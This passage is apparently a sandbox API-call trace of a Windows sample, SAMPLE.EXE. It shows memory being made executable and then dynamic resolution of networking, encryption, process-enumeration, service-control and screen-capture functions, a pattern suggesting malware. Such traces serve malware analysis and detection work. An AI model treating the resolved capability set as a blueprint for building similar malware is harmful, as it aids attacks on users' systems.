dwMinorVersion=0x7373, dwBuildNumber=0x6, dwPlatformId=0xffffffff, szCSDVersion="s}5w") | out: lpVersionInformation=0x18e40c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0069.558] VirtualAlloc (lpAddress=0x0, dwSize=0x119000, flAllocationType=0x1000, flProtect=0x4) returned 0x1ea0000 [0069.584] VirtualProtect (in: lpAddress=0x400000, dwSize=0x137000, flNewProtect=0x40, lpflOldProtect=0x18f494 | out: lpflOldProtect=0x18f494*=0x2) returned 1 [0069.896] VirtualFree (lpAddress=0x1ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.903] LoadLibraryA (lpLibFileName="RPCRT4.dll") returned 0x768e0000 [0069.904] GetProcAddress (hModule=0x768e0000, lpProcName="RpcStringFreeW") returned 0x76901635 [0069.904] GetProcAddress (hModule=0x768e0000, lpProcName="UuidCreate") returned 0x768ff48b [0069.904] GetProcAddress (hModule=0x768e0000, lpProcName="UuidToStringW") returned 0x76921ee5 [0069.904] GetProcAddress (hModule=0x768e0000, lpProcName="RpcStringFreeA") returned 0x76923fc5 [0069.904] GetProcAddress (hModule=0x768e0000, lpProcName="UuidToStringA") returned 0x7695d918 [0069.904] LoadLibraryA (lpLibFileName="MPR.dll") returned 0x74550000 [0069.908] GetProcAddress (hModule=0x74550000, lpProcName="WNetOpenEnumW") returned 0x74552f06 [0069.908] GetProcAddress (hModule=0x74550000, lpProcName="WNetEnumResourceW") returned 0x74553058 [0069.908] GetProcAddress (hModule=0x74550000, lpProcName="WNetCloseEnum") returned 0x74552dd6 [0069.908] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75190000 [0069.926] GetProcAddress (hModule=0x75190000, lpProcName="InternetCloseHandle") returned 0x751aab49 [0069.926] GetProcAddress (hModule=0x75190000, lpProcName="InternetReadFile") returned 0x751ab406 [0069.926] GetProcAddress (hModule=0x75190000, lpProcName="InternetOpenUrlW") returned 0x7520be5c [0069.926] GetProcAddress (hModule=0x75190000, lpProcName="InternetOpenW") returned 0x751b9197 [0069.926] GetProcAddress (hModule=0x75190000, lpProcName="HttpQueryInfoW") returned 0x751b5c75 [0069.926] GetProcAddress (hModule=0x75190000, lpProcName="InternetOpenA") returned 0x751bf18e [0069.926] GetProcAddress (hModule=0x75190000, lpProcName="InternetOpenUrlA") returned 0x751d30f1 [0069.926] LoadLibraryA (lpLibFileName="WINMM.dll") returned 0x74510000 [0069.930] GetProcAddress (hModule=0x74510000, lpProcName="timeGetTime") returned 0x745126e0 [0069.930] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x753b0000 [0069.931] GetProcAddress (hModule=0x753b0000, lpProcName="PathAppendA") returned 0x753bd65e [0069.931] GetProcAddress (hModule=0x753b0000, lpProcName="PathFindFileNameW") returned 0x753cbb71 [0069.931] GetProcAddress (hModule=0x753b0000, lpProcName="PathRemoveFileSpecW") returned 0x753c3248 [0069.931] GetProcAddress (hModule=0x753b0000, lpProcName="PathFileExistsA") returned 0x753ead1a [0069.931] GetProcAddress (hModule=0x753b0000, lpProcName="PathFileExistsW") returned 0x753c45bf [0069.931] GetProcAddress (hModule=0x753b0000, lpProcName="PathAppendW") returned 0x753c81ef [0069.931] GetProcAddress (hModule=0x753b0000, lpProcName="PathFindExtensionW") returned 0x753ca1b9 [0069.931] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76e10000 [0069.932] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualFree") returned 0x76e2186e [0069.932] GetProcAddress (hModule=0x76e10000, lpProcName="WriteFile") returned 0x76e21282 [0069.932] GetProcAddress (hModule=0x76e10000, lpProcName="GetDriveTypeA") returned 0x76e3ef75 [0069.932] GetProcAddress (hModule=0x76e10000, lpProcName="OpenProcess") returned 0x76e21986 [0069.932] GetProcAddress (hModule=0x76e10000, lpProcName="GlobalAlloc") returned 0x76e2588e [0069.932] GetProcAddress (hModule=0x76e10000, lpProcName="GetSystemDirectoryW") returned 0x76e25063 [0069.932] GetProcAddress (hModule=0x76e10000, lpProcName="WideCharToMultiByte") returned 0x76e2170d [0069.932] GetProcAddress (hModule=0x76e10000, lpProcName="LoadLibraryW") returned 0x76e2492b [0069.932] GetProcAddress (hModule=0x76e10000, lpProcName="Sleep") returned 0x76e210ff [0069.932] GetProcAddress (hModule=0x76e10000, lpProcName="CopyFileW") returned 0x76e4830d [0069.933] GetProcAddress (hModule=0x76e10000, lpProcName="FormatMessageW") returned 0x76e24620 [0069.933] GetProcAddress (hModule=0x76e10000, lpProcName="lstrcpynW") returned 0x76e4d556 [0069.933] GetProcAddress (hModule=0x76e10000, lpProcName="CreateProcessA") returned 0x76e21072 [0069.933] GetProcAddress (hModule=0x76e10000, lpProcName="TerminateProcess") returned 0x76e3d802 [0069.933] GetProcAddress (hModule=0x76e10000, lpProcName="ReadFile") returned 0x76e23ed3 [0069.933] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileW") returned 0x76e23f5c [0069.933] GetProcAddress (hModule=0x76e10000, lpProcName="lstrcatA") returned 0x76e42b7a [0069.933] GetProcAddress (hModule=0x76e10000, lpProcName="GetEnvironmentVariableA") returned 0x76e233a0 [0069.933] GetProcAddress (hModule=0x76e10000, lpProcName="lstrcmpW") returned 0x76e25929 [0069.933] GetProcAddress (hModule=0x76e10000, lpProcName="MultiByteToWideChar") returned 0x76e2192e [0069.934] GetProcAddress (hModule=0x76e10000, lpProcName="lstrlenW") returned 0x76e21700 [0069.934] GetProcAddress (hModule=0x76e10000, lpProcName="FlushFileBuffers") returned 0x76e2469b [0069.934] GetProcAddress (hModule=0x76e10000, lpProcName="GetShortPathNameA") returned 0x76e4594d [0069.934] GetProcAddress (hModule=0x76e10000, lpProcName="GetFileSizeEx") returned 0x76e259e2 [0069.934] GetProcAddress (hModule=0x76e10000, lpProcName="GetLastError") returned 0x76e211c0 [0069.934] GetProcAddress (hModule=0x76e10000, lpProcName="SetLastError") returned 0x76e211a9 [0069.934] GetProcAddress (hModule=0x76e10000, lpProcName="GetProcAddress") returned 0x76e21222 [0069.934] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualAlloc") returned 0x76e21856 [0069.934] GetProcAddress (hModule=0x76e10000, lpProcName="MoveFileW") returned 0x76e39af0 [0069.935] GetProcAddress (hModule=0x76e10000, lpProcName="FindClose") returned 0x76e24442 [0069.935] GetProcAddress (hModule=0x76e10000, lpProcName="Process32FirstW") returned 0x76e48baf [0069.935] GetProcAddress (hModule=0x76e10000, lpProcName="LocalAlloc") returned 0x76e2168c [0069.935] GetProcAddress (hModule=0x76e10000, lpProcName="CreateEventW") returned 0x76e2183e [0069.935] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleFileNameA") returned 0x76e214b1 [0069.935] GetProcAddress (hModule=0x76e10000, lpProcName="Process32NextW") returned 0x76e4896c [0069.935] GetProcAddress (hModule=0x76e10000, lpProcName="lstrcatW") returned 0x76e4828e [0069.935] GetProcAddress (hModule=0x76e10000, lpProcName="CreateMutexA") returned 0x76e24c6b [0069.935] GetProcAddress (hModule=0x76e10000, lpProcName="FindNextFileW") returned 0x76e254ee [0069.936] GetProcAddress (hModule=0x76e10000, lpProcName="CreateToolhelp32Snapshot") returned 0x76e4735f [0069.936] GetProcAddress (hModule=0x76e10000, lpProcName="SetEnvironmentVariableA") returned 0x76e2e331 [0069.936] GetProcAddress (hModule=0x76e10000, lpProcName="DeleteFileW") returned 0x76e289b3 [0069.936] GetProcAddress (hModule=0x76e10000, lpProcName="LocalFree") returned 0x76e22d3c [0069.936] GetProcAddress (hModule=0x76e10000, lpProcName="lstrcpyW") returned 0x76e43102 [0069.936] GetProcAddress (hModule=0x76e10000, lpProcName="DeleteFileA") returned 0x76e25444 [0069.936] GetProcAddress (hModule=0x76e10000, lpProcName="lstrcpyA") returned 0x76e42a9d [0069.936] GetProcAddress (hModule=0x76e10000, lpProcName="SetPriorityClass") returned 0x76e3cf28 [0069.936] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentProcess") returned 0x76e21809 [0069.936] GetProcAddress (hModule=0x76e10000, lpProcName="GetComputerNameW") returned 0x76e2dd0e [0069.937] GetProcAddress (hModule=0x76e10000, lpProcName="GetLogicalDrives") returned 0x76e25371 [0069.937] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleFileNameW") returned 0x76e24950 [0069.937] GetProcAddress (hModule=0x76e10000, lpProcName="SetStdHandle") returned 0x76ea454f [0069.937] GetProcAddress (hModule=0x76e10000, lpProcName="GetVersion") returned 0x76e24467 [0069.937] GetProcAddress (hModule=0x76e10000, lpProcName="CreateDirectoryA") returned 0x76e4d526 [0069.937] GetProcAddress (hModule=0x76e10000, lpProcName="CreateThread") returned 0x76e234d5 [0069.937] GetProcAddress (hModule=0x76e10000, lpProcName="CompareStringW") returned 0x76e23bca [0069.937] GetProcAddress (hModule=0x76e10000, lpProcName="GetTimeFormatW") returned 0x76e3f481 [0069.937] GetProcAddress (hModule=0x76e10000, lpProcName="GetDateFormatW") returned 0x76e434d7 [0069.937] GetProcAddress (hModule=0x76e10000, lpProcName="EnumSystemLocalesW") returned 0x76ea425f [0069.938] GetProcAddress (hModule=0x76e10000, lpProcName="GetUserDefaultLCID") returned 0x76e23da5 [0069.938] GetProcAddress (hModule=0x76e10000, lpProcName="IsValidLocale") returned 0x76e3ce46 [0069.938] GetProcAddress (hModule=0x76e10000, lpProcName="GetLocaleInfoW") returned 0x76e23c42 [0069.938] GetProcAddress (hModule=0x76e10000, lpProcName="CreateSemaphoreW") returned 0x76e3ca5a [0069.938] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleHandleW") returned 0x76e234b0 [0069.938] GetProcAddress (hModule=0x76e10000, lpProcName="GetTickCount") returned 0x76e2110c [0069.938] GetProcAddress (hModule=0x76e10000, lpProcName="TlsFree") returned 0x76e23587 [0069.939] GetProcAddress (hModule=0x76e10000, lpProcName="TlsSetValue") returned 0x76e214fb [0069.939] GetProcAddress (hModule=0x76e10000, lpProcName="TlsGetValue") returned 0x76e211e0 [0069.939] GetProcAddress (hModule=0x76e10000, lpProcName="TlsAlloc") returned 0x76e249ad [0069.945] GetProcAddress (hModule=0x76e10000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76e21916 [0069.946] GetProcAddress (hModule=0x76e10000, lpProcName="SetUnhandledExceptionFilter") returned 0x76e287c9 [0069.946] GetProcAddress (hModule=0x76e10000, lpProcName="UnhandledExceptionFilter") returned 0x76e4772f [0069.946] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleHandleA") returned 0x76e21245 [0069.946] GetProcAddress (hModule=0x76e10000, lpProcName="GetVersionExA") returned 0x76e23519 [0069.946] GetProcAddress (hModule=0x76e10000, lpProcName="GlobalMemoryStatus") returned 0x76e28b6d [0069.946] GetProcAddress (hModule=0x76e10000, lpProcName="LoadLibraryA") returned 0x76e249d7 [0069.946] GetProcAddress (hModule=0x76e10000, lpProcName="FlushConsoleInputBuffer") returned 0x76ec7a9f [0069.947] GetProcAddress (hModule=0x76e10000, lpProcName="WaitForSingleObject") returned 0x76e21136 [0069.947] GetProcAddress (hModule=0x76e10000, lpProcName="CreateDirectoryW") returned 0x76e24259 [0069.947] GetProcAddress (hModule=0x76e10000, lpProcName="SetFilePointerEx") returned 0x76e3c807 [0069.947] GetProcAddress (hModule=0x76e10000, lpProcName="CreateProcessW") returned 0x76e2103d [0069.947] GetProcAddress (hModule=0x76e10000, lpProcName="FreeLibrary") returned 0x76e234c8 [0069.947] GetProcAddress (hModule=0x76e10000, lpProcName="SetErrorMode") returned 0x76e21b00 [0069.947] GetProcAddress (hModule=0x76e10000, lpProcName="lstrlenA") returned 0x76e25a4b [0069.947] GetProcAddress (hModule=0x76e10000, lpProcName="SetFilePointer") returned 0x76e217d1 [0069.947] GetProcAddress (hModule=0x76e10000, lpProcName="FindFirstFileW") returned 0x76e24435 [0069.948] GetProcAddress (hModule=0x76e10000, lpProcName="SetConsoleMode") returned 0x76e3a77d [0069.948] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0069.948] GetProcAddress (hModule=0x76e10000, lpProcName="GetCommandLineW") returned 0x76e25223 [0069.948] GetProcAddress (hModule=0x76e10000, lpProcName="GetNumberOfConsoleInputEvents") returned 0x76ec793f [0069.948] GetProcAddress (hModule=0x76e10000, lpProcName="PeekConsoleInputA") returned 0x76ec6f0d [0069.948] GetProcAddress (hModule=0x76e10000, lpProcName="FreeEnvironmentStringsW") returned 0x76e251cb [0069.948] GetProcAddress (hModule=0x76e10000, lpProcName="GetEnvironmentStringsW") returned 0x76e251e3 [0069.948] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentProcessId") returned 0x76e211f8 [0069.949] GetProcAddress (hModule=0x76e10000, lpProcName="QueryPerformanceCounter") returned 0x76e21725 [0069.949] GetProcAddress (hModule=0x76e10000, lpProcName="GetTimeZoneInformation") returned 0x76e2465a [0069.949] GetProcAddress (hModule=0x76e10000, lpProcName="RaiseException") returned 0x76e258a6 [0069.949] GetProcAddress (hModule=0x76e10000, lpProcName="GetStringTypeW") returned 0x76e21946 [0069.949] GetProcAddress (hModule=0x76e10000, lpProcName="GetConsoleCP") returned 0x76ec7bff [0069.949] GetProcAddress (hModule=0x76e10000, lpProcName="ReadConsoleW") returned 0x76ec739a [0069.949] GetProcAddress (hModule=0x76e10000, lpProcName="GetConsoleMode") returned 0x76e21328 [0069.949] GetProcAddress (hModule=0x76e10000, lpProcName="HeapSize") returned 0x77353002 [0069.949] GetProcAddress (hModule=0x76e10000, lpProcName="LoadLibraryExW") returned 0x76e2495d [0069.949] GetProcAddress (hModule=0x76e10000, lpProcName="OutputDebugStringW") returned 0x76e4d1d4 [0069.950] GetProcAddress (hModule=0x76e10000, lpProcName="SetConsoleCtrlHandler") returned 0x76e28a09 [0069.950] GetProcAddress (hModule=0x76e10000, lpProcName="RtlUnwind") returned 0x76e4d1c3 [0069.950] GetProcAddress (hModule=0x76e10000, lpProcName="FatalAppExitA") returned 0x76ea4691 [0069.950] GetProcAddress (hModule=0x76e10000, lpProcName="GetStartupInfoW") returned 0x76e24d40 [0069.950] GetProcAddress (hModule=0x76e10000, lpProcName="GetExitCodeProcess") returned 0x76e3174d [0069.950] GetProcAddress (hModule=0x76e10000, lpProcName="LCMapStringW") returned 0x76e217b9 [0069.950] GetProcAddress (hModule=0x76e10000, lpProcName="DeleteCriticalSection") returned 0x773545f5 [0069.950] GetProcAddress (hModule=0x76e10000, lpProcName="AreFileApisANSI") returned 0x76ea40d1 [0069.950] GetProcAddress (hModule=0x76e10000, lpProcName="ExitProcess") returned 0x76e27a10 [0069.951] GetProcAddress (hModule=0x76e10000, lpProcName="GetProcessHeap") returned 0x76e214e9 [0069.951] GetProcAddress (hModule=0x76e10000, lpProcName="HeapReAlloc") returned 0x77361f6e [0069.951] GetProcAddress (hModule=0x76e10000, lpProcName="GlobalFree") returned 0x76e25558 [0069.951] GetProcAddress (hModule=0x76e10000, lpProcName="SetEndOfFile") returned 0x76e3ce2e [0069.951] GetProcAddress (hModule=0x76e10000, lpProcName="ReadConsoleInputA") returned 0x76ec6f53 [0069.951] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0069.951] GetProcAddress (hModule=0x76e10000, lpProcName="HeapFree") returned 0x76e214c9 [0069.951] GetProcAddress (hModule=0x76e10000, lpProcName="HeapAlloc") returned 0x7734e026 [0069.952] GetProcAddress (hModule=0x76e10000, lpProcName="EnterCriticalSection") returned 0x773422b0 [0069.952] GetProcAddress (hModule=0x76e10000, lpProcName="LeaveCriticalSection") returned 0x77342270 [0069.952] GetProcAddress (hModule=0x76e10000, lpProcName="GetStdHandle") returned 0x76e251b3 [0069.952] GetProcAddress (hModule=0x76e10000, lpProcName="GetFileType") returned 0x76e23531 [0069.952] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleHandleExW") returned 0x76e24a6f [0069.952] GetProcAddress (hModule=0x76e10000, lpProcName="WriteConsoleW") returned 0x76e47aca [0069.953] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0069.953] GetProcAddress (hModule=0x76e10000, lpProcName="DecodePointer") returned 0x77359d35 [0069.953] GetProcAddress (hModule=0x76e10000, lpProcName="GetSystemTimeAsFileTime") returned 0x76e23509 [0069.953] GetProcAddress (hModule=0x76e10000, lpProcName="IsDebuggerPresent") returned 0x76e24a5d [0069.953] GetProcAddress (hModule=0x76e10000, lpProcName="IsProcessorFeaturePresent") returned 0x76e25235 [0069.953] GetProcAddress (hModule=0x76e10000, lpProcName="IsValidCodePage") returned 0x76e24493 [0069.953] GetProcAddress (hModule=0x76e10000, lpProcName="GetACP") returned 0x76e2179c [0069.953] GetProcAddress (hModule=0x76e10000, lpProcName="GetOEMCP") returned 0x76e4d1a1 [0069.953] GetProcAddress (hModule=0x76e10000, lpProcName="GetCPInfo") returned 0x76e25189 [0069.953] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentThread") returned 0x76e217ec [0069.954] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentThreadId") returned 0x76e21450 [0069.954] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x76780000 [0069.954] GetProcAddress (hModule=0x76780000, lpProcName="PeekMessageW") returned 0x767a05ba [0069.954] GetProcAddress (hModule=0x76780000, lpProcName="PostThreadMessageW") returned 0x76798bff [0069.954] GetProcAddress (hModule=0x76780000, lpProcName="DefWindowProcW") returned 0x773525dd [0069.954] GetProcAddress (hModule=0x76780000, lpProcName="DispatchMessageW") returned 0x7679787b [0069.954] GetProcAddress (hModule=0x76780000, lpProcName="UpdateWindow") returned 0x767a3559 [0069.955] GetProcAddress (hModule=0x76780000, lpProcName="CreateWindowExW") returned 0x76798a29 [0069.955] GetProcAddress (hModule=0x76780000, lpProcName="LoadCursorW") returned 0x767988f7 [0069.955] GetProcAddress (hModule=0x76780000, lpProcName="IsWindow") returned 0x76797136 [0069.955] GetProcAddress (hModule=0x76780000, lpProcName="ShowWindow") returned 0x767a0dfb [0069.955] GetProcAddress (hModule=0x76780000, lpProcName="RegisterClassExW") returned 0x7679b17d [0069.956] GetProcAddress (hModule=0x76780000, lpProcName="PostQuitMessage") returned 0x76799abb [0069.956] GetProcAddress (hModule=0x76780000, lpProcName="GetMessageW") returned 0x767978e2 [0069.956] GetProcAddress (hModule=0x76780000, lpProcName="DestroyWindow") returned 0x76799a55 [0069.956] GetProcAddress (hModule=0x76780000, lpProcName="SendMessageW") returned 0x76799679 [0069.956] GetProcAddress (hModule=0x76780000, lpProcName="GetProcessWindowStation") returned 0x76799eea [0069.956] GetProcAddress (hModule=0x76780000, lpProcName="GetUserObjectInformationW") returned 0x76798068 [0069.956] GetProcAddress (hModule=0x76780000, lpProcName="MessageBoxA") returned 0x767efd1e [0069.956] GetProcAddress (hModule=0x76780000, lpProcName="GetDesktopWindow") returned 0x767a0a19 [0069.956] GetProcAddress (hModule=0x76780000, lpProcName="MessageBoxW") returned 0x767efd3f [0069.957] GetProcAddress (hModule=0x76780000, lpProcName="TranslateMessage") returned 0x76797809 [0069.957] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x754b0000 [0069.957] GetProcAddress (hModule=0x754b0000, lpProcName="RegCloseKey") returned 0x754c469d [0069.957] GetProcAddress (hModule=0x754b0000, lpProcName="CloseServiceHandle") returned 0x754c369c [0069.957] GetProcAddress (hModule=0x754b0000, lpProcName="GetUserNameW") returned 0x754c157a [0069.957] GetProcAddress (hModule=0x754b0000, lpProcName="ReportEventA") returned 0x754b3ee9 [0069.957] GetProcAddress (hModule=0x754b0000, lpProcName="RegisterEventSourceA") returned 0x754c2d46 [0069.957] GetProcAddress (hModule=0x754b0000, lpProcName="DeregisterEventSource") returned 0x754c35dd [0069.957] GetProcAddress (hModule=0x754b0000, lpProcName="CryptHashData") returned 0x754bdf36 [0069.958] GetProcAddress (hModule=0x754b0000, lpProcName="RegSetValueExW") returned 0x754c14d6 [0069.958] GetProcAddress (hModule=0x754b0000, lpProcName="CryptDestroyHash") returned 0x754bdf66 [0069.958] GetProcAddress (hModule=0x754b0000, lpProcName="ControlService") returned 0x754d7144 [0069.958] GetProcAddress (hModule=0x754b0000, lpProcName="RegOpenKeyExW") returned 0x754c468d [0069.958] GetProcAddress (hModule=0x754b0000, lpProcName="CryptCreateHash") returned 0x754bdf4e [0069.958] GetProcAddress (hModule=0x754b0000, lpProcName="CryptEncrypt") returned 0x754d779b [0069.958] GetProcAddress (hModule=0x754b0000, lpProcName="CryptImportKey") returned 0x754bc532 [0069.958] GetProcAddress (hModule=0x754b0000, lpProcName="QueryServiceStatus") returned 0x754c2a86 [0069.958] GetProcAddress (hModule=0x754b0000, lpProcName="RegQueryValueExW") returned 0x754c46ad [0069.959] GetProcAddress (hModule=0x754b0000, lpProcName="CryptReleaseContext") returned 0x754be124 [0069.959] GetProcAddress (hModule=0x754b0000, lpProcName="OpenServiceW") returned 0x754bca4c [0069.959] GetProcAddress (hModule=0x754b0000, lpProcName="OpenSCManagerW") returned 0x754bca64 [0069.959] GetProcAddress (hModule=0x754b0000, lpProcName="CryptAcquireContextW") returned 0x754bdf14 [0069.959] GetProcAddress (hModule=0x754b0000, lpProcName="CryptGetHashParam") returned 0x754bdf7e [0069.959] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75670000 [0069.963] GetProcAddress (hModule=0x75670000, lpProcName="SHGetPathFromIDListW") returned 0x757017bf [0069.963] GetProcAddress (hModule=0x75670000, lpProcName="SHGetSpecialFolderLocation") returned 0x756fe141 [0069.963] GetProcAddress (hModule=0x75670000, lpProcName="ShellExecuteA") returned 0x758b7078 [0069.964] GetProcAddress (hModule=0x75670000, lpProcName="ShellExecuteExW") returned 0x75691e46 [0069.964] GetProcAddress (hModule=0x75670000, lpProcName="CommandLineToArgvW") returned 0x75689ee8 [0069.964] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathA") returned 0x75787804 [0069.964] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x762c0000 [0069.964] GetProcAddress (hModule=0x762c0000, lpProcName="CoInitialize") returned 0x762db636 [0069.964] GetProcAddress (hModule=0x762c0000, lpProcName="CoInitializeSecurity") returned 0x762e7259 [0069.965] GetProcAddress (hModule=0x762c0000, lpProcName="CoUninitialize") returned 0x763086d3 [0069.965] GetProcAddress (hModule=0x762c0000, lpProcName="CoCreateInstance") returned 0x76309d0b [0069.965] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x769d0000 [0069.965] GetProcAddress (hModule=0x769d0000, lpProcName=0x6) returned 0x769d3e59 [0069.965] GetProcAddress (hModule=0x769d0000, lpProcName=0x8) returned 0x769d3ed5 [0069.965] GetProcAddress (hModule=0x769d0000, lpProcName=0x9) returned 0x769d3eae [0069.965] GetProcAddress (hModule=0x769d0000, lpProcName=0xc8) returned 0x769d3f21 [0069.966] GetProcAddress (hModule=0x769d0000, lpProcName=0xca) returned 0x769dfd6b [0069.966] GetProcAddress (hModule=0x769d0000, lpProcName=0xc9) returned 0x769d4af8 [0069.966] GetProcAddress (hModule=0x769d0000, lpProcName=0xc) returned 0x769d5dee [0069.966] GetProcAddress (hModule=0x769d0000, lpProcName=0x2) returned 0x769d4642 [0069.966] LoadLibraryA (lpLibFileName="IPHLPAPI.DLL") returned 0x74570000 [0069.972] GetProcAddress (hModule=0x74570000, lpProcName="GetAdaptersInfo") returned 0x74579263 [0069.972] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75360000 [0069.974] GetProcAddress (hModule=0x75360000, lpProcName=0xc) returned 0x7536b131 [0069.974] GetProcAddress (hModule=0x75360000, lpProcName=0xb) returned 0x7536311b [0069.974] GetProcAddress (hModule=0x75360000, lpProcName=0x34) returned 0x75377673 [0069.974] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x744a0000 [0069.979] GetProcAddress (hModule=0x744a0000, lpProcName="DnsFree") returned 0x744a436b [0069.980] GetProcAddress (hModule=0x744a0000, lpProcName="DnsQuery_W") returned 0x744b572c [0069.980] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x75550000 [0069.980] GetProcAddress (hModule=0x75550000, lpProcName="CryptStringToBinaryA") returned 0x75585d77 [0069.980] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x752d0000 [0069.980] GetProcAddress (hModule=0x752d0000, lpProcName="DeleteObject") returned 0x752e5689 [0069.980] GetProcAddress (hModule=0x752d0000, lpProcName="GetObjectA") returned 0x752e85d4 [0069.980] GetProcAddress (hModule=0x752d0000, lpProcName="SelectObject") returned 0x752e4f70 [0069.981] GetProcAddress (hModule=0x752d0000, lpProcName="GetDeviceCaps") returned 0x752e4de0 [0069.981] GetProcAddress (hModule=0x752d0000, lpProcName="GetBitmapBits") returned 0x752ec155 [0069.981] GetProcAddress (hModule=0x752d0000, lpProcName="BitBlt") returned 0x752e5ea6 [0069.981] GetProcAddress (hModule=0x752d0000, lpProcName="DeleteDC") returned 0x752e58b3 [0069.981] GetProcAddress (hModule=0x752d0000, lpProcName="CreateDCA") returned 0x752e7bcc [0069.981] GetProcAddress (hModule=0x752d0000, lpProcName="CreateCompatibleDC") returned 0x752e54f4 [0069.981] GetProcAddress (hModule=0x752d0000, lpProcName="CreateCompatibleBitmap") returned 0x752e5f49 [0069.981] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x743e0000 [0069.996] GetProcAddress (hModule=0x743e0000, lpProcName="atexit") returned 0x743fc544 [0069.996] atexit (param_1=0x540920) returned 0 [0070.011] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f4a4 | out: lpSystemTimeAsFileTime=0x18f4a4*(dwLowDateTime=0x99f1ed60, dwHighDateTime=0x1d5d6b4)) [0070.011] GetCurrentThreadId () returned 0x770 [0070.011] GetCurrentProcessId () returned 0x7f0 [0070.011] QueryPerformanceCounter (in: lpPerformanceCount=0x18f49c | out: lpPerformanceCount=0x18f49c*=21133637754) returned 1 [0070.075] GetStartupInfoW (in: lpStartupInfo=0x18f434 | out: lpStartupInfo=0x18f434*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x76e23519, hStdOutput=0x7733fd35, hStdError=0x773a7daf)) [0070.091] GetProcessHeap () returned 0x680000 [0070.196] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76e10000 [0070.196] GetProcAddress (hModule=0x76e10000, lpProcName="FlsAlloc") returned 0x76e24f2b [0070.196] GetProcAddress (hModule=0x76e10000, lpProcName="FlsFree") returned 0x76e2359f [0070.197] GetProcAddress (hModule=0x76e10000, lpProcName="FlsGetValue") returned 0x76e21252 [0070.197] GetProcAddress (hModule=0x76e10000, lpProcName="FlsSetValue") returned 0x76e24208 [0070.197] GetProcAddress (hModule=0x76e10000, lpProcName="InitializeCriticalSectionEx") returned 0x76e24d28 [0070.197] GetProcAddress (hModule=0x76e10000, lpProcName="CreateEventExW") returned 0x76ea410b [0070.197] GetProcAddress (hModule=0x76e10000, lpProcName="CreateSemaphoreExW") returned 0x76ea4195 [0070.197] GetProcAddress (hModule=0x76e10000, lpProcName="SetThreadStackGuarantee") returned 0x76e2d31f [0070.197] GetProcAddress (hModule=0x76e10000, lpProcName="CreateThreadpoolTimer") returned 0x76e3ee7e [0070.197] GetProcAddress (hModule=0x76e10000, lpProcName="SetThreadpoolTimer") returned 0x7736441c [0070.198] GetProcAddress (hModule=0x76e10000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x7738c50e [0070.198] GetProcAddress (hModule=0x76e10000, lpProcName="CloseThreadpoolTimer") returned 0x7738c381 [0070.198] GetProcAddress (hModule=0x76e10000, lpProcName="CreateThreadpoolWait") returned 0x76e3f088 [0070.198] GetProcAddress (hModule=0x76e10000, lpProcName="SetThreadpoolWait") returned 0x773705d7 [0070.198] GetProcAddress (hModule=0x76e10000, lpProcName="CloseThreadpoolWait") returned 0x7738ca24 [0070.198] GetProcAddress (hModule=0x76e10000, lpProcName="FlushProcessWriteBuffers") returned 0x77340b8c [0070.198] GetProcAddress (hModule=0x76e10000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x773ffde8 [0070.198] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentProcessorNumber") returned 0x77391e1d [0070.198] GetProcAddress (hModule=0x76e10000, lpProcName="GetLogicalProcessorInformation") returned 0x76ea4761 [0070.199] GetProcAddress (hModule=0x76e10000, lpProcName="CreateSymbolicLinkW") returned 0x76e9cd11 [0070.199] GetProcAddress (hModule=0x76e10000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0070.199] GetProcAddress (hModule=0x76e10000, lpProcName="EnumSystemLocalesEx") returned 0x76ea424f [0070.199] GetProcAddress (hModule=0x76e10000, lpProcName="CompareStringEx") returned 0x76ea46b1 [0070.199] GetProcAddress (hModule=0x76e10000, lpProcName="GetDateFormatEx") returned 0x76eb6676 [0070.199] GetProcAddress (hModule=0x76e10000, lpProcName="GetLocaleInfoEx") returned 0x76ea4751 [0070.199] GetProcAddress (hModule=0x76e10000, lpProcName="GetTimeFormatEx") returned 0x76eb65f1 